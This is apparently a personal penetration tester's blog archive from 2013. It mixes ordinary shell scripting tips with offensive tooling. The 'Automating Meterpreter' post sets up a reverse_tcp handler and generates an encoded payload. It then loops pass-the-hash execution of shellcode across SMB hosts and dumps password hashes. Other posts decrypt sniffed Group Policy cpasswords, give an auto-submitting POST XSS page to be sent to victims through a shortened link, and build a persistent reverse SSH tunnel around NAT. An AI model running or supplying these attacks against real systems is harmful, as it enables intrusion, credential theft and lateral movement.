Monday, December 30, 2013

Ruby script to grab a fake name out of

require 'open-uri'
require 'nokogiri'

# the URL of the fake-name page did not survive in the post; placeholder, change it
url = 'https://example.invalid/'

# every <h3> inside a <div class="address"> holds one generated name
Nokogiri::HTML(URI.open(url)).xpath("//div[@class='address']/h3").each { |node| puts node.text.strip }

Thursday, November 21, 2013

Burn Linux ISO image to USB drive on a Mac OSX

Ubuntu has a guide on doing it for Ubuntu installs, but it should work just fine for the other distros:

I tested it with Debian and it worked fine.

Tuesday, November 19, 2013

Legal advice for all you evil hackers

What to do in the case of a "knock and talk" by the police:

What to do if the police have a search warrant:

Monday, October 14, 2013

How to check if an IP from a domain is in a list of IPs

# DOMAIN is a placeholder for the name you want to check
grep -F -x "$(dig +short DOMAIN)" file-of-ips.txt
The +short parameter returns only the IP address(es) that DOMAIN resolves to. Quoting the substitution keeps each returned address as its own grep pattern (dig may return several), and -F -x makes grep match whole lines literally, so 10.0.0.1 does not also match 10.0.0.10.

Friday, October 4, 2013


Stole this from some forum. Just google it and you can find the source.

Frequency Note
0.5 - 1.8 MHz BC Band. AM Radio
1.8 - 30 MHz Shortwave Band.
30 - 78 MHz 6 Meter Ham
76 - 108 MHz FM Radio
108 - 137 MHz Air Band
137 - 174 MHz 144 MHz Ham. 2 Meter
174 - 222 MHz VHF-TV
222 - 225 MHz 222 MHz Ham
225 - 420 MHz General Band 1
420 - 470 MHz 440 MHz Ham. 70 cm.
470 - 800 MHz UHF-TV
800 - 999 MHz General Band 2 Cellular Blocked

50 - 54 MHz
144 - 148 MHz
222 - 225 MHz USA version only
430 - 440 MHz

TX w/ mod
50 - 54 MHz
144 - 148 MHz
148 - 174 MHz MARS/CAP Mod only
222 - 225 MHz USA version only
430 - 440 MHz
440 - 470 MHz MARS/CAP Mod only. FRS/GMRS freq range

Tuesday, September 17, 2013

Test allowed firewall ports

Sometimes you are behind some paywall/captive portal/firewall and you feel like certain ports would be let through, if only you knew which of the over 65,000 ports they were. The only way to really know is to check each one individually. That's where the following site comes in.

It's a site that registers every port as open. This way you know that if something is allowed through, it will come back in your port scan.

So, from behind your firewall, run this (the all-ports-open host is the site above):
nmap -p- -T4 -oA firewallcheck <all-ports-open-host>
Now you can check firewallcheck.nmap (or parse it out of the .gnmap file) and find out which ports allow data through.
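As an added example (not from the original post), here is one way to pull the allowed ports out of the firewallcheck.gnmap file and collapse them into ranges; the sample host 203.0.113.10 and its gnmap lines are constructed:

```shell
#!/bin/bash
# Added example: extract the ports the firewall let through from nmap's grepable output.
# Assumption: the scanned host answers on every TCP port, so every "open" entry in the
# gnmap file is a port the firewall allows.

# open_ports_from_gnmap FILE  -- one open port number per line, numerically sorted.
# gnmap packs all ports of a host into one tab-separated "Ports:" field:
#   Host: a.b.c.d ()<TAB>Ports: 22/open/tcp//ssh///, 25/filtered/tcp//smtp///<TAB>Ignored State: ...
open_ports_from_gnmap() {
    awk -F '\t' '
        /^Host:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    n = split(substr($i, 8), entry, ", ")
                    for (j = 1; j <= n; j++) {
                        split(entry[j], f, "/")      # f[1]=port f[2]=state f[3]=proto
                        if (f[2] == "open") print f[1]
                    }
                }
            }
        }' "$1" | sort -n -u
}

# compress_ranges  -- stdin: sorted port numbers; stdout: "22,80,443,8080-8082"
# (the form you can hand back to nmap -p or paste into a report)
compress_ranges() {
    awk '
        function flush() {
            out = out (out == "" ? "" : ",") (start == prev ? start : start "-" prev)
        }
        NR == 1        { start = $1; prev = $1; next }
        $1 == prev + 1 { prev = $1; next }
                       { flush(); start = $1; prev = $1 }
        END            { if (NR > 0) { flush(); print out } }'
}

# write_sample_gnmap FILE  -- constructed sample in gnmap format (203.0.113.10 is a
# documentation address); only here so the functions above can be exercised offline.
write_sample_gnmap() {
    printf '# Nmap scan initiated (constructed sample) as: nmap -p- -T4 -oA firewallcheck 203.0.113.10\n' > "$1"
    printf 'Host: 203.0.113.10 ()\tStatus: Up\n' >> "$1"
    printf 'Host: 203.0.113.10 ()\tPorts: 22/open/tcp//ssh///, 25/filtered/tcp//smtp///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/open/tcp//http-proxy///, 8081/open/tcp//blackice-icecap///, 8082/open/tcp//blackice-alerts///\tIgnored State: filtered (65528)\n' >> "$1"
    printf '# Nmap done (constructed sample)\n' >> "$1"
}

# allowed_port_ranges FILE  -- end to end: gnmap file in, compact range list out
allowed_port_ranges() {
    open_ports_from_gnmap "$1" | compress_ranges
}

if [ "${1:-}" ]; then          # usage: ./allowed.sh firewallcheck.gnmap
    allowed_port_ranges "$1"
fi
```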

Wednesday, August 21, 2013

Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesn't tell you what ranges there are, and expects you to do it in 2 weeks, tell them to politely fuck off.

Thursday, August 15, 2013

echo colored text in bash

Lots of tutorials tell you to use "echo -e" with raw ANSI escape sequences to generate the colors for output. First of all, those are practically impossible to read, they look like magic, and it's a bitch to try to find a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.
#!/bin/bash
# echo_color COLOR TEXT...  - echo TEXT in COLOR via tput (readable, unlike raw ANSI escapes)
# (the color names on the case labels were lost from the post; standard tput setaf order is assumed)
echo_color() {
 case ${1} in
  black)
   shift 1
   #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
   echo "$(tput setaf 0)${*}$(tput sgr0)" ;;
  red)
   shift 1
   echo "$(tput setaf 1)${*}$(tput sgr0)" ;;
  green)
   shift 1
   echo "$(tput setaf 2)${*}$(tput sgr0)" ;;
  yellow)
   shift 1
   echo "$(tput setaf 3)${*}$(tput sgr0)" ;;
  blue)
   shift 1
   echo "$(tput setaf 4)${*}$(tput sgr0)" ;;
  cyan)
   shift 1
   echo "$(tput setaf 6)${*}$(tput sgr0)" ;;
  magenta)
   shift 1
   echo "$(tput setaf 5)${*}$(tput sgr0)" ;;
  white)
   shift 1
   echo "$(tput setaf 7)${*}$(tput sgr0)" ;;
  underline)
   #yes i know its not a color, its still useful though (smul is its own capability, not a setaf argument)
   shift 1
   echo "$(tput smul)${*}$(tput sgr0)" ;;
  custom)
   #custom COLOR_CODE TEXT...
   color_code=${2}
   shift 2
   echo "$(tput setaf ${color_code})${*}$(tput sgr0)" ;;
  ls-color-codes)
   for i in $(seq 0 255); do
    tput setaf ${i}
    printf " %3s" "$i"
    tput sgr0
    if [ $(( (i + 1) % 16 )) -eq 0 ] ; then
     echo #New line
    fi
   done ;;
  *)
   cat <<EOF
This script will echo your text as a specified color.

 $0 <black|red|green|yellow|blue|cyan|magenta|white|underline> text...
 $0 custom COLOR_CODE text...
 $0 ls-color-codes
EOF
   ;;
 esac
}
echo_color "$@"
I'm particularly happy with my ls-color-codes argument; it will print a 16x16 box of the color codes in their colors.

Happy scripting!

Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hack job, but it worked, and this blog is more for notes for myself anyway...

Generate the post-exploitation command rc file:

cat > /root/automsf.rc <<EOF
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump
EOF

Then run msfconsole to listen for the callback:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <listener IP>
set AutoRunScript multi_console_command -rc /root/automsf.rc
exploit -j -z
Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Then run the for loop while serving sce from a share:
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto-loads the rest of the payload, executes the .rc file, and exits. Rinse and repeat with the next IP.

Tuesday, July 23, 2013

SSH Persistent Connection Script

I just reinstalled a test machine and forgot to save my SSH tunnel script, so I decided to write a new one.

#!/bin/bash
#this script will constantly maintain (via crontab) a remote forward connection to another machine. This can
#be used as a way to connect to a jumpbox to get over a pesky NAT

# the settings did not survive in the post; placeholder values, change them to match your jumpbox
remote_listen_port=2222
local_ssh_port=22
remote_user="user"
remote_host="jumpbox.example"
identity_file="/root/.ssh/id_rsa"

# each -o takes exactly one option, so ServerAliveInterval needs its own -o
connect_string="ssh -N -T -R ${remote_listen_port}:localhost:${local_ssh_port} ${remote_user}@${remote_host} -i ${identity_file} -o ConnectTimeout=60 -o ServerAliveInterval=10"

process_is_up () {
 ps aux | grep -F "${connect_string}" | grep -v grep > /dev/null
}

start_bot () {
 ${connect_string}
}

if process_is_up ; then
 echo process is up, exiting
 exit 1
else
 echo process is down, starting now
 start_bot &
fi
#add to root homedir and then crontab with the following line:
#* * * * * /root/ > /dev/null

Get/Set Fan Speeds for AMD Video Cards in Linux

I'm messing around with GPU cracking and I've been changing fan speeds manually a lot so I wrote a script to do it for me. This script will output the temperature & fan speed of the two cards in my system, as well as allow me to set the fan speeds for either/both:
#!/bin/bash
# gives environmental stats about the ATI videocards. this assumes you have two cards
get_fan_speed () {      # $1 = adapter number
        aticonfig --pplib-cmd "get fanspeed ${1}" | grep '%' | cut -d ':' -f 3
}

set_fan_speed () {      # $1 = adapter number, $2 = fan percent
        aticonfig --pplib-cmd "set fanspeed ${1} ${2}"
}

get_temp () {           # $1 = adapter number
        aticonfig --adapter=${1} --odgt | grep Temp | cut -d '-' -f 2
}

if [[ -z ${1} ]]; then #if no arguments then output stats
        echo "0: $(get_temp 0) --$(get_fan_speed 0 )"
        echo "1: $(get_temp 1) --$(get_fan_speed 1 )"
else
        case ${1} in
                get)
                        get_fan_speed ${2}
                        ;;
                set)
                        oldspeed=$(get_fan_speed ${2})
                        set_fan_speed ${2} ${3}
                        echo "${2}: ${oldspeed} -> $(get_fan_speed ${2})"
                        ;;
                setboth)
                        oldspeed=$(get_fan_speed 0)
                        set_fan_speed 0 ${2}
                        echo "0: ${oldspeed} -> $(get_fan_speed 0)"
                        oldspeed=$(get_fan_speed 1)
                        set_fan_speed 1 ${2}
                        echo "1: ${oldspeed} -> $(get_fan_speed 1)"
                        ;;
                *)
                        echo "Usage: $0 [get Adapter_NUM | set Adapter_NUM fan_PERCENT | setboth fan_PERCENT]"
                        ;;
        esac
fi

Wednesday, June 5, 2013

Getting Better At Bash Scripting

Some people really suck at bash scripting. Some people are just lazy. I'm the latter. Often times I know what's best, I just don't care because it really doesn't matter in that particular situation...

Here are a couple of sites that made me the go-to person for bashisms and all the "why doesn't this work" bash questions.

The bash-hackers link is a frackin' gold mine.

Wednesday, May 29, 2013

Awk vs cut

The useless use of cat is an oft-thrown-around smack on the hand for lots of noobs asking questions on forums.

This post is not about the useless use of cat; it's about me being in a mood to nitpick about something I read on that page. If you go towards the "Gripes" section of the page you will see the following:

Frederick also remarks:

I disagree with your awk/cut comment, as I often use awk for everything and cut for nothing because the syntax for awk is so much cleaner for one liners and I don't have to RTFM so much.
I'll counter that awk is overkill, and you don't need to reread the cut manual after you've read it once or twice; that's my experience. Also cut much more clearly conveys to the reader what is going on -- a small awk script certainly should not take a lot of time to decode, but if you do it too quickly, there might be subtle points which are easy to miss. By contrast, cut doesn't have those subtleties, for better or for worse.

Even when doing something as simple as printing out the second column of a line, cut and awk process the line in importantly different ways (and just because I'm an ass, I'll use cat uselessly):

$ cat file
word1 word2 word3
blah1 blah2 blah3

$ cat file | cut -d ' ' -f 2

$ cat file | awk '{print $2}'

So let's see here why the cut command sucks balls. Let's add a SINGLE SPACE ANYWHERE between the words. In this case, between word1 and word2:

$ cat file
word1  word2 word3
blah1 blah2 blah3

Now, let's run both the cut and awk commands again, starting with awk this time:

$ cat file | awk '{print $2}'

OK, works like someone would expect it to... what about cut?
$ cat file | cut -d ' ' -f 2


WTF? yeah, screw you cut. awk ftw

awk is smarter than cut when it comes to recognizing where the "words" are. cut just looks at the input and thinks it goes like this:


So unless you ABSOLUTELY KNOW your input is formatted correctly, use awk instead of cut. It's safer.
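Added example (not code from the original post): the cut/awk difference above as small functions, plus the whitespace squeeze that makes cut behave when you still want it, and an awk FS='[ ]' trick that reproduces cut's literal splitting. The sample lines are constructed.

```shell
#!/bin/bash
# Added example: why "cut -d ' ' -f 2" and "awk '{print $2}'" disagree, and how to make cut safe.

# what the post runs: cut treats EVERY space as a delimiter, so two spaces in a row
# produce an empty field and the "second column" comes back empty.
second_field_cut() { cut -d ' ' -f 2; }

# awk's default FS splits on runs of blanks (spaces and tabs) and ignores leading ones,
# which is what a human means by "the second word".
second_field_awk() { awk '{ print $2 }'; }

# cut made safe: drop leading blanks, collapse each run of blanks to one space, then cut.
# (tr -s squeezes the repeats; the sed is needed because a leading space would otherwise
# still count as a delimiter and make field 1 empty.)
second_field_cut_squeezed() {
    sed 's/^[[:blank:]]*//' | tr -s '[:blank:]' ' ' | cut -d ' ' -f 2
}

# how many "words" each tool sees on a line, to show exactly where they diverge:
# awk counts runs of blanks as one separator ...
count_fields_awk() { awk '{ print NF }'; }
# ... while FS="[ ]" (a bracket expression, unlike the special FS=" ") is a literal single
# space, i.e. cut's view: empty fields included.
count_fields_cut_style() { awk -F '[ ]' '{ print NF }'; }

# demo: run every variant over constructed lines (double space, leading blanks, a tab)
demo() {
    printf 'word1  word2 word3\nblah1 blah2 blah3\n  lead1 lead2\ntab1\ttab2 x\n' |
    while IFS= read -r line; do
        printf '%-22s cut=[%s] awk=[%s] squeezed=[%s]\n' "$line" \
            "$(printf '%s\n' "$line" | second_field_cut)" \
            "$(printf '%s\n' "$line" | second_field_awk)" \
            "$(printf '%s\n' "$line" | second_field_cut_squeezed)"
    done
}
```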

Monday, May 6, 2013

Get list of AD Domain Controllers from DNS records

I used to be dumb and find it annoying to get the list of DCs that I would target in a pentest. Apparently it's super easy to get them from DNS records.

nslookup -type=srv _ldap._tcp.dc._msdcs.DOMAIN
Replace DOMAIN with whatever the actual AD domain is. If you are using the internal DNS servers, you can typically just do a "nslookup -r" to get the FQDN of the machine. That usually provides you with the domain part.


Other ways I've found that work:

If you have shell access:
netdom query /D:DOMAINNAME DC
net view /domain
nltest /dsgetdc:DOMAINNAME

Wednesday, April 10, 2013

Monday, April 8, 2013

Learning to Hack - Vulnerable Testbeds

There are a crap ton of vulnerable testbeds to educate the interested in how applications/operating systems get hacked. I'll update this list as I come across them:


Recently found these links on reddit for Capture The Flag challenges:

Monday, March 18, 2013

Download ShmooCon 2013 Videos

ShmooCon released their videos on their website for everyone to download.

wget -i <(cat <<EOF
2013 - Opening Remarks & Rants.mp4
2013 - How to Own a Building BacNET Attack Framework.mp4
2013 - Mainframed The Secrets Inside that Black Box.mp4
2013 - WIPE THE DRIVE - Techniques for Malware Persistence.mp4
2013 - Apple iOS Certificate Tomfoolery.mp4
2013 - Hide and Seek, Post-Exploitation Style.mp4
2013 - Hackers get Schooled Learning Lessons from Academia.mp4
2013 - Friday Fire Talks.mp4
2013 - Running a CTF - Panel on the Art of Hacker Gaming.mp4
2013 - C10M Defending The Internet At Scale.mp4
2013 - Paparazzi Over IP.mp4
2013 - DIY Using Trust to Secure Embedded Projects.mp4
2013 - Moloch A New And Free Way To Index Your Packet Capture Repository-1.mp4
2013 - OpenStack Security Brief.mp4
2013 - Generalized Single Packet Auth for Cloud Envions.mp4
2013 - From Shotgun Parsers to Better Software Stacks.mp4
2013 - The Computer Fraud and Abuse Act Swartz, Auernheimer, and Beyond.mp4
2013 - Malware Analysis Collaboration Automation & Training.mp4
2013 - Bright Shiny Things Intelligent DA Control.mp4
2013 - Strategies of a World Class Security Inciden.mp4
2013 - Armoring Your Android Apps.mp4
2013 - Protecting Sensitive Information on iOS Devices.mp4
2013 - Beyond Nymwars - Online Identity Battle.mp4
2013 - How Smart Is BlueTooth Smart.mp4
2013 - Chopshop Busting the Gh0st.mp4
2013 - The Cloud - Storms on the Horizon.mp4
2013 - 0wn The Con.mp4
2013 - PunkSPIDER Open Source Fuzzing Proj Tgting the Internet.mp4
2013 - Crypto - Youre Doing It Wrong.mp4
2013 - Identity Based Internet Protocol.mp4
2013 - NSM and more with Bro Network Monitor.mp4
2013 - These Go To Eleven - When the Law Goes Too Far.mp4
2013 - Forensics - ExFat Bastardized for Cameras.mp4
2013 - Page Fault Liberation Army or Better Security Through Trapping.mp4
2013 - Hacking as an Act of War.mp4
2013 - MASTIFF - Automated Static Analysis Framewor.mp4
2013 - Attacking SCADA Wireless Systems.mp4
2013 - Ka-Ching - How to Make Real Money.mp4
2013 - Is Practical Info Sharing Possible.mp4
EOF
)

You can copy and paste that into your terminal and it will download the videos to that directory.

Friday, March 8, 2013

Tmux screen logging workaround

I really like tmux; it's sexy, sleek, actively developed, and has amazing mouse support. I only had one problem (so far) with the transition from GNU screen: output logging.

GNU screen has an amazing config option that I used almost all the time:

logfile screenlogs/%S%Y%m%d-%n.log
deflog on

The problem is that tmux doesn't have the same option :( The closest thing I have seen is the "pipe-pane" option, but I couldn't find any way to automate that upon startup of tmux. I figured, well, since tmux doesn't let me do it, maybe I can hack something together myself. And that's exactly what I did. I give to you... tmux output logging via the script command:
# only start logging when this shell is a direct child of tmux (TERM is "screen" there)
if [[ $TERM = "screen" ]] && [[ $(ps $PPID -o comm=) = "tmux" ]] ; then
    logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
    mkdir -p "$HOME/logs" 2> /dev/null
    # -t 1: flush to the log every second; run a login bash inside the recorded session
    script -t 1 "$HOME/logs/${logname}" bash -login
fi
The above code checks if the $TERM variable is set to "screen" (tmux does this by default) and then checks if the parent PID's name is "tmux". Then it sets up a logging environment and outputs everything to the logfile it specifies.

That code works for OS X; for your basic GNU/Linux setup try this instead:

if [[ $TERM = "screen" ]] && [[ $(ps -p $PPID -o comm=) = "tmux" ]]; then
    logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
    mkdir -p "$HOME/logs" 2> /dev/null
    # -f: flush the log after every write (the Linux util-linux script flag)
    script -f "$HOME/logs/${logname}"
fi

All you have to do is put that code into your .profile or .bashrc/.bash_profile and you are good to go.


Sunday, March 3, 2013

Bash script to sniff, parse, and decrypt cpassword's from GPOs

#!/bin/bash
parse_username () {
        echo -n "$1" | grep -o -P 'runAs=".*?"' | cut -d'"' -f 2
}
parse_cpassword () {
        echo -n "$1" | grep -o -P 'cpassword=".*?"' | cut -d'"' -f 2
}
decrypt_cpassword () {
        cpassword="$1"
        pad_length=$(( (4 - ${#cpassword} % 4) % 4 )) # figure out the padding length (0 when already a multiple of 4)
        padding=$(printf '%*s' "${pad_length}" '' | tr ' ' '=') #output correct padding string
        #pad, b64 decode, then decrypt the password (zero IV; the plaintext is UTF-16LE, so convert it)
        echo -n "${cpassword}${padding}" | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 00000000000000000000000000000000 | iconv -f UTF-16LE -t UTF-8
}

tshark -R 'smb.cmd==0x2e and tcp contains "cpassword"' -Tfields -e smb.file_data \
| xxd -r -p | grep cpassword \
| while read line; do
        echo "$(parse_username "$line"):$(decrypt_cpassword "$(parse_cpassword "$line")")"
done

Figlet Fonts

These seem to be the least awful ones...


figlet -f stop KITTENS

Wednesday, February 27, 2013

The Best USB WiFi Adapter for Pentests

I've spent a couple of days researching which USB WiFi adapter is best to use in wireless penetration tests/site surveys.

If you are only concerned about the 2.4 GHz spectrum, then the widely suggested ALFA AWUS036H is still the best and works flawlessly out of the box.

The problem arises when you are trying to cover both the 2.4 and 5 GHz ranges. I'll save you the rant about my search for the right device and just give it to you here:

The only dual-band (2.4/5 GHz) USB adapter that works out of the box with everything, including WPS cracking (reaver), that you can currently buy is the Ubiquiti SR71 USB adapter. It comes up under the carl9170 driver in BT5r3.

Hopefully this saves you the days it took me to figure out which one is the best.

After some extensive testing I've noticed that it sometimes has a problem with WPS cracking and can be a bit finicky with the drivers. The ALFA AWUS036H still works flawlessly. I'm going to be testing more and more devices and will report when I have something.

Monday, February 11, 2013

Exploiting POST Based XSS

Found this on the web somewhere and wanted to post it here to have a place to reference it. Place the actual XSS in the "abcd" section and put the page on a webserver somewhere. Bitly link the exploit code to your target and have it execute.
<body onload="xss();">
<form method=post name=f action="">
<input name="abcd" value="<SCRIPT>alert('XSS')</SCRIPT>">
<input type="submit" class="button" name="s">
</form>
<script>
function xss() { document.f.submit(); }
</script>
</body>

Tuesday, February 5, 2013

Using Nmap Output in Nikto

Nikto can read/parse nmap output to supply a list of hosts and ports to scan:

nikto -h nmap_scan.gnmap

This will make nikto read the gnmap file, pull out the hostnames and port numbers, and start scanning. It's really handy versus manually grepping out entries to scan.

Monday, February 4, 2013

Base64 Encoding and the Stupid Things Developers Do

Base64 encoding is everywhere. It's the #1 data encoding type used on the internet. Even though it technically increases the size of the data by 33%, it's still used in spaces where speed is of the utmost importance.

Mainly for two reasons: it's ubiquitous, and it was meant to be used to transmit non-ASCII data in ASCII-only systems. Base64 was originally designed as a method to transmit binary information through plaintext channels such as attachments on emails. Email is still plaintext, so anything that's not plaintext needs to be represented differently or else the email servers/clients would barf upon reading it.

Where the Problem Lies:
The problem is when developers don't truly understand the concept of encoding and mentally group it into the same category as encryption. ENCODING IS NOT ENCRYPTION, and don't let anyone tell you otherwise. Changing the location of the secret base from English to Spanish does not protect the location from the enemy. It's especially annoying when someone tries to back up the argument of encoding as encryption by saying something like "well, if they don't speak Spanish then it's just as good". No, it's not, because that's not security, that's obfuscation. All I have to do is find someone who speaks Spanish and the game is over. I used to think that if you used an encoding type nobody has ever seen before then maybe that's moving into the security category, but unfortunately it's not, because that requires a massive underestimation of people's ability to obsess over puzzles. Just don't do it; it's really not that hard...

So, if you have sensitive information (passwords, credit cards, SSNs, keys, etc.) and you only base64 encode it, then you are sending it in cleartext. Every developer should consider base64 encoding as equivalent in security to plaintext, because in the end, it is.

Bash Caveat - It's all just text

This is an important thing to consider when writing Bash scripts. In my experience it's not necessarily the little command tricks that you know that make you a better coder, it's the underlying understanding of how things work.

You’re dealing with Text
Mentally keeping track of the contents of variables, or of what's being passed in a pipe, is actually rather simple in Bash. Everything is a string. There are no fancy object-oriented concepts that you have to consider when dealing with data. It's all just text. Take the following for example:

cat file | cut -f1 | sort -u | wc -l

While the above falls under the category of "useless use of cat", it's done to illustrate a point. You are taking the text output of a command and passing it as the text input of another command. THAT'S IT. The "target" program that you pass the data to has its own rules on how to deal with the text. In the above case what is happening is: cat opens the file and outputs its contents as the input for the cut command, which reads in the text and (due to -f1) outputs the first tab-delimited field. This output text is passed directly to the sort command, which alphabetically sorts the list and eliminates the duplicates (-u). sort then outputs this text, and the pipe (again) takes the output and sends it to wc, which counts the lines (-l) and outputs the result.

The only thing programs like this are designed to do is mangle/modify/analyze text in some way.

The nice thing about only dealing with text is that you can see its state/contents at any point, simply by outputting it to the screen.

I believe that keeping in mind you are only dealing with strings of text is one of the most important considerations to remember when writing bash scripts. 

The other good thing about the "everything is a string" philosophy is that you can tell which programs were built for scripting and which were mainly built for human consumption. The main question you have to ask is: how much parsing of text do I have to do to get some simple data out? If the answer is "a lot", then you may want to search for another tool/program that is more API-focused.

Saturday, January 26, 2013

Rant: OSX Find Clipboard - Invokes Baby Punching

OS X has multiple clipboards that allow you to do fairly user-friendly actions such as drag and drop of various files, fonts, text, etc. Among these clipboards is the global "Find Pasteboard". This has been by far the stupidest and most shortsighted idea I have ever seen implemented by Apple.

At first it seems like a great idea: select text somewhere, hit cmd+e, and search for it in a completely separate application just by hitting cmd+g. I'm sure certain people find that very useful. But there is a problem with this. A problem that makes me want to punch babies.

For example:
If you search for text in Chrome on a webpage and you switch to Sublime Text 2 to search for something in your code, it automatically inputs the text that you typed into Chrome into the Sublime "find" box. OK... that's odd, I'll just backspace and start typing my search. Ah damn, I forgot the syntax to that one Perl regex. When you switch back to Chrome to search the page, IT COMPLETELY WIPES OUT/REPLACES YOUR SEARCH IN SUBLIME. So that big long regex I was typing in Sublime? Gone. Thanks Apple, your "feature" wiped out the last 30 minutes of research I was doing. This is the type of thing that creates serial killers.

The absolute worst part about all of it, the part where apple's arrogance and unbelievable big head ruins everything, is in the fact that THERE IS NO WAY TO DISABLE IT. AT ALL. ZILCH. NADA. They simply say that "this is intended behavior" which is the equivalent of them giving you the finger and saying "deal with it".

The entire idea of the find clipboard itself is stupid. It's a feature thats hardly known, and much more likely to cause frustration and issues than the problems it solves. The probability that you need to search for two different strings in different applications is obscenely higher than the few situations in which you want to search text from one app in another.

I'm not saying take this feature out, as i'm sure someone might be using it, i'm simply asking for a way to disable it.

This issue is more evidence of what I believe to be Apple's worst quality: the arrogance of their imposed "user experience" on the consumer. I'm done with Apple; this issue is on top of the dozens of other things of theirs that have driven me mad. I'm going back to Linux. At least then I have 100% control over my computer.

Thursday, January 24, 2013

Barracuda SSH Backdoors

Today I learned of an advisory posted on reddit regarding Barracuda and certain "support" SSH backdoors installed on many of their products. Unfortunately I don't have a Barracuda product to test the specific attack strings on, but I have been able to gather quite a bit of information on it:

Here is the reddit netsec article on it:

Here is the Neohapsis copypasta from SEC-consult:

Here is the original advisory:

Barracuda released several "tech alerts" about this vuln:

Here is a full disclosure post in 2011 where someone suspected Barracuda had a backdoor (for lolz)

Here is a blog post from 2009 (seriously) of a guy that got root access from the console and revealed overlapping details about the advisory:

Summary of the situation:
The following products:
     Barracuda Spam and Virus Firewall
     Barracuda Web Filter
     Barracuda Message Archiver
     Barracuda Web Application Firewall
     Barracuda Link Balancer
     Barracuda Load Balancer
     Barracuda SSL VPN
     (all including their respective virtual "Vx" versions)
vulnerable version: all versions less than Security Definition 2.0.5

All have preinstalled (undocumented) support accounts with SSH access in /etc/passwd.
The "product" support account drops you to a shell without requiring SSH keys, and it also has access to the MySQL database, which can modify the list of users who can log in...

Only hosts coming from certain IPs can access this ssh daemon:

There are certain reports that the "product" user requires no password.

If anyone can get me the user hashes, I can run them through my (pretty big/extensive) wordlists with rulesets.

Tuesday, January 22, 2013

Edit Text Without Using Files

Lots of times on engagements I'll have to take a big chunk of data, for example user credentials, and parse/format it a particular way. Typically it can be done quickly by placing the text into a small temp file and then parsing the contents that way.

The problem is that you are then left with a bunch of crap files you don't need. Granted, I could just put everything in the /tmp folder, or create another temp folder altogether, but I didn't want to have to deal with files at all.

In come here documents. Here documents are awesome for stuff like this. Take this example:

cat <<EOFMEOW | awk '{print $3}'


Now all I need to do is paste the text once it spits back the '>' prompt.

Wednesday, January 16, 2013

Windows Network Service Internals - IPC/RPC

Here are the core MSRPC functions/capabilities. It includes things like interacting with the SAM, the registry, the event log, the service control manager and much more:

Saturday, January 5, 2013

Pentest Bookmarks - Single Links

Here is a list of the pentest-bookmarks grabbed from
I needed to parse them for a project, so I modified it to a one-link-per-line format. I figured someone else might be able to use it for something, so I'm posting it here.

EDIT: here is the line I used (BOOKMARKS_URL stands in for the bookmarks file URL, which did not survive in the post; grep needs -P for the non-greedy .*?):

grep -o -P '<A HREF="http.*?"' <(curl -s BOOKMARKS_URL) | sort -u | cut -d '"' -f 2